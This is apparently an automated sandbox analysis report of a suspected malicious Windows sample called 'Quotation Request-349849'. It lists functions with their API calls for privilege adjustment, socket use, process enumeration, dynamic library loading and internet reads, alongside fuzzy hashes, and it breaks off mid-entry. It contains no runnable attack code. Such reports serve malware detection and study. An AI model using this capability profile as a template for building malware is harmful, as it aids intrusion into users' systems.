                                                      • API String ID: 2387731787-0
                                                      • Opcode ID: 76d7027b97beed8ce66b926257e2a8cb57395ea4df5297a6a5f4ee3c9039528d
                                                      • Instruction ID: 203aa7f2c3cafe86a8cd6a1c494f54b9eb6d3aeb5553bc573964662ec002b9db
                                                      • Opcode Fuzzy Hash: 76d7027b97beed8ce66b926257e2a8cb57395ea4df5297a6a5f4ee3c9039528d
                                                      • Instruction Fuzzy Hash: 875178B5604606DFD718DF28C491EAAB3E4FF89324F10465AEA56C73A1DB34ED04CB91
                                                      Function 00846747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00847D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00847DB6
                                                      • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0084679E
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 008467C7
                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00846800
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 0084680D
                                                      • closesocket.WSOCK32(00000000,00000000), ref: 00846821
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                      • String ID:
                                                      • API String ID: 99427753-0
                                                      • Opcode ID: 29673c2e8d32bc8546165e910320831c990bbcabec5da0f56be0dbf5e96106ba
                                                      • Instruction ID: 419acda106295212de63138a3859cc5cd1bd3a6e889341a42709d49c0afa87d3
                                                      • Opcode Fuzzy Hash: 29673c2e8d32bc8546165e910320831c990bbcabec5da0f56be0dbf5e96106ba
                                                      • Instruction Fuzzy Hash: EA41B675B00214AFDB50BF64888AF2E77B8EF49714F048559FA15AB3C2DA789D008792
                                                      Function 00855376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                      • String ID:
                                                      • API String ID: 292994002-0
                                                      • Opcode ID: 6169090604a2eaa2c3d84bcccd18e2a532fa173fed8a5c500d6d06fea181db99
                                                      • Instruction ID: e1f3d943e17c106bf7301c8f4d597fcadbc36f780854b4fc4ee4178320566386
                                                      • Opcode Fuzzy Hash: 6169090604a2eaa2c3d84bcccd18e2a532fa173fed8a5c500d6d06fea181db99
                                                      • Instruction Fuzzy Hash: 4D110431300A11AFDB216F26DC58AAE7BA8FF457A2B404029FD09D3342DB78DD0186A4
                                                      Function 008280A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 008280C0
                                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 008280CA
                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 008280D9
                                                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 008280E0
                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 008280F6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                      • String ID:
                                                      • API String ID: 44706859-0
                                                      • Opcode ID: befe523a58c7dd58c68fca84f2ebd629db323e7b2948b062f4987bbae4662355
                                                      • Instruction ID: 8b3afa89f7c2afdaac2b049baa081dd4cccf626b12b2f0e6b6ee8efa8fbd2de0
                                                      • Opcode Fuzzy Hash: befe523a58c7dd58c68fca84f2ebd629db323e7b2948b062f4987bbae4662355
                                                      • Instruction Fuzzy Hash: 30F0C230246314EFEB114FA4EC8CE6B3BACFF49756F440025FA05C3191CB649C55DA60
                                                      Function 0083C397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CoInitialize.OLE32(00000000), ref: 0083C432
                                                      • CoCreateInstance.OLE32(00862D6C,00000000,00000001,00862BDC,?), ref: 0083C44A
                                                        • Part of subcall function 007D7DE1: _memmove.LIBCMT ref: 007D7E22
                                                      • CoUninitialize.OLE32 ref: 0083C6B7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: CreateInitializeInstanceUninitialize_memmove
                                                      • String ID: .lnk
                                                      • API String ID: 2683427295-24824748
                                                      • Opcode ID: 9b47dc8a5cf65768efdea195a967c6934446ea73a355848c1a03c6d16103bac3
                                                      • Instruction ID: 4f24942ba72e729b391459edbf14679a14e6abd3bfb92aa0903684b688507828
                                                      • Opcode Fuzzy Hash: 9b47dc8a5cf65768efdea195a967c6934446ea73a355848c1a03c6d16103bac3
                                                      • Instruction Fuzzy Hash: DCA14B71204205AFD700EF54C885EABB7F8FF94354F00492EF195972A2EB75EA49CB62
                                                      Function 007D4B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,007D4AD0), ref: 007D4B45
                                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 007D4B57
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: GetNativeSystemInfo$kernel32.dll
                                                      • API String ID: 2574300362-192647395
                                                      • Opcode ID: c4e74a2233ee49eeacc39afd76ed4728e61e851d1c1b8a688682f93edb30de1d
                                                      • Instruction ID: 3f30d8a282393ac748c753fa405de18ade726921d9b9e5b18237bc3438854801
                                                      • Opcode Fuzzy Hash: c4e74a2233ee49eeacc39afd76ed4728e61e851d1c1b8a688682f93edb30de1d
                                                      • Instruction Fuzzy Hash: F7D01274A50713DFD7209F31D818B0676E4BF15392B11883B99D5D6251E678D480C655
                                                      Function 0084EE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 0084EE3D
                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 0084EE4B
                                                        • Part of subcall function 007D7DE1: _memmove.LIBCMT ref: 007D7E22
                                                      • Process32NextW.KERNEL32(00000000,?), ref: 0084EF0B
                                                      • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0084EF1A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                      • String ID:
                                                      • API String ID: 2576544623-0
                                                      • Opcode ID: 0408a4808452125a11eeff68a0d0030fc183534f2e33bca1a4052d9d75480412
                                                      • Instruction ID: 80cb0c9d21bc81f152ea9672c9c23cf1f09d32fa27d832d05ae3a82b826e8d65
                                                      • Opcode Fuzzy Hash: 0408a4808452125a11eeff68a0d0030fc183534f2e33bca1a4052d9d75480412
                                                      • Instruction Fuzzy Hash: 22516A71504715ABD310EF24D885E6BB7F8FF98710F10482EF595D72A2EB74A908CB92
                                                      Function 0082E616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0082E628
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: lstrlen
                                                      • String ID: ($|
                                                      • API String ID: 1659193697-1631851259
                                                      • Opcode ID: 15f574c9fa4e8dd9100f33c08fa2668b37205fa4c29286163209d1e3414943e9
                                                      • Instruction ID: 15978b2baef86bc0ea55f02506695bcbb0124fe83f77974da88ef52dc2ab3e52
                                                      • Opcode Fuzzy Hash: 15f574c9fa4e8dd9100f33c08fa2668b37205fa4c29286163209d1e3414943e9
                                                      • Instruction Fuzzy Hash: 2B3234B5A007159FDB28CF19D48096AB7F0FF58320B15C46EE89ADB3A1E770E981CB44
                                                      Function 008422EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0084180A,00000000), ref: 008423E1
                                                      • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00842418
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Internet$AvailableDataFileQueryRead
                                                      • String ID:
                                                      • API String ID: 599397726-0
                                                      • Opcode ID: 0e2f2cfd748443a93e2540df44b622670bc8fbc0658c94d05051f7a4ba766600
                                                      • Instruction ID: 1d48f6cc0323ac0d47b3be598e6f2610988b6f5d0ba3ea9cc72a16f1228d0b7e
                                                      • Opcode Fuzzy Hash: 0e2f2cfd748443a93e2540df44b622670bc8fbc0658c94d05051f7a4ba766600
                                                      • Instruction Fuzzy Hash: A441F371A0830DFFEB10DE95DC85EBBB7BCFB40328F50406AF601E6251EA759E419664
                                                      Function 0083B3FB Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 0083B40B
                                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0083B465
                                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0083B4B2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$DiskFreeSpace
                                                      • String ID:
                                                      • API String ID: 1682464887-0
                                                      • Opcode ID: 5d14425ca4aef7eb86b8a11d2802572081fb21c060aa0b6bee936a9e22dd61d9
                                                      • Instruction ID: 088ebe6a36821b3da2c92d87b3eb7096084dfeb05820723c81d624326d16f28b
                                                      • Opcode Fuzzy Hash: 5d14425ca4aef7eb86b8a11d2802572081fb21c060aa0b6bee936a9e22dd61d9
                                                      • Instruction Fuzzy Hash: D721A175A00208EFCB00EFA5D884AEDBBB8FF49310F0480AAE905EB352CB359915CB55
                                                      Function 008287E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 007F0DB6: std::exception::exception.LIBCMT ref: 007F0DEC
                                                        • Part of subcall function 007F0DB6: __CxxThrowException@8.LIBCMT ref: 007F0E01
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0082882B
                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00828858
                                                      • GetLastError.KERNEL32 ref: 00828865
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                      • String ID:
                                                      • API String ID: 1922334811-0
                                                      • Opcode ID: 6c8f69bfa7c69494ed35c479a891cd40d57f77bd93d50f4a22768ec850704e15
                                                      • Instruction ID: 3abb28481a1ee5a5e54d08289bb1392b988ba7627c2b60841599e385ec4c517a
                                                      • Opcode Fuzzy Hash: 6c8f69bfa7c69494ed35c479a891cd40d57f77bd93d50f4a22768ec850704e15
                                                      • Instruction Fuzzy Hash: 5F1160B1514308EFEB18DF64EC89D6BB7A8FB44711B24852EE55597342EB34BC408B60
                                                      Function 0082874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00828774
                                                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0082878B
                                                      • FreeSid.ADVAPI32(?), ref: 0082879B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                                      • String ID:
                                                      • API String ID: 3429775523-0
                                                      • Opcode ID: 577ab97f084c799b7ad244704c627263ca35ca461b9a4871b0caaac5d5f7e103
                                                      • Instruction ID: c55e8fc5a62f57471dbd2daaefbacc0021b930f37f28f818b0022088cffb9625
                                                      • Opcode Fuzzy Hash: 577ab97f084c799b7ad244704c627263ca35ca461b9a4871b0caaac5d5f7e103
                                                      • Instruction Fuzzy Hash: 2FF0FF7595130DBFDF04DFF4DD89AAEB7BCFF08212F504469AA01E2182D7755A448B50
                                                      Function 0083C6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0083C6FB
                                                      • FindClose.KERNEL32(00000000), ref: 0083C72B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Find$CloseFileFirst
                                                      • String ID:
                                                      • API String ID: 2295610775-0
                                                      • Opcode ID: ec7d26c26406913205a09974e53384b250871979fd1355dd72374d8ce8630fd8
                                                      • Instruction ID: a962fce750b71d95c0a73aa06280064979c55af9c042835802c4fcad7065bf27
                                                      • Opcode Fuzzy Hash: ec7d26c26406913205a09974e53384b250871979fd1355dd72374d8ce8630fd8
                                                      • Instruction Fuzzy Hash: 45115E726006049FDB10EF29D849A6AF7E9FF85725F00851EF9A9D73A1DB34A805CF81
                                                      Function 0083A06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00849468,?,0085FB84,?), ref: 0083A097
                                                      • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00849468,?,0085FB84,?), ref: 0083A0A9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ErrorFormatLastMessage
                                                      • String ID:
                                                      • API String ID: 3479602957-0
                                                      • Opcode ID: 7bc0adad4fee120dfb763cd868622cce93724e4bc080741785b6c7a173b306a6
                                                      • Instruction ID: 83f4b16f5277acadbeabfcc86470da9bacdd83f095ea0b1fe9c26a18cfd15109
                                                      • Opcode Fuzzy Hash: 7bc0adad4fee120dfb763cd868622cce93724e4bc080741785b6c7a173b306a6
                                                      • Instruction Fuzzy Hash: B4F05E3510522DABDB25AFA4CC48FEA776DFF08361F004166B949D6281D6309940CBA1
                                                      Function 008281CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00828309), ref: 008281E0
                                                      • CloseHandle.KERNEL32(?,?,00828309), ref: 008281F2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: AdjustCloseHandlePrivilegesToken
                                                      • String ID:
                                                      • API String ID: 81990902-0
                                                      • Opcode ID: d636429c2e8667d4a486394604301c8d31db0370f012585a79b07e6333d4ed08
                                                      • Instruction ID: df39f48c04c7c0761cd1cf9c39e230e6d440f67342171c31e9fb6c5ba0d0ff68
                                                      • Opcode Fuzzy Hash: d636429c2e8667d4a486394604301c8d31db0370f012585a79b07e6333d4ed08
                                                      • Instruction Fuzzy Hash: 58E0BF71011610EFEB252B71EC09D7777A9FB04311B14882DB55584571DB655C91DB50
                                                      Function 007FA155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,007F8D57,?,?,?,00000001), ref: 007FA15A
                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 007FA163
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      • String ID:
                                                      • API String ID: 3192549508-0
                                                      • Opcode ID: 8bd4cdf9054d897334b7bfaf306c50972f5c4a3c44ecf7f30fd75f794c9d02a0
                                                      • Instruction ID: d5150e27d5ccd370fa8ddbafc234acbbb1d62cca04eb856d9c2c2f097f885d44
                                                      • Opcode Fuzzy Hash: 8bd4cdf9054d897334b7bfaf306c50972f5c4a3c44ecf7f30fd75f794c9d02a0
                                                      • Instruction Fuzzy Hash: D1B09231054308ABEA002F91ED09BC93F6AFB44AA3F404020F70D84272CB6654508A91
                                                      Function 007FF1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f4d2c7139ab45998cd357503c9b527787d4fb6c9449f52f0b988989e200feed1
                                                      • Instruction ID: 7901cac06646cda6767188c06a3de49a2778b625d8167a6aeca547c6a3aafe78
                                                      • Opcode Fuzzy Hash: f4d2c7139ab45998cd357503c9b527787d4fb6c9449f52f0b988989e200feed1
                                                      • Instruction Fuzzy Hash: 1F321422D29F054DD7239634D832336A249BFB73D8F15E737E929B5AA6EF68C4834140
                                                      Function 0080242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
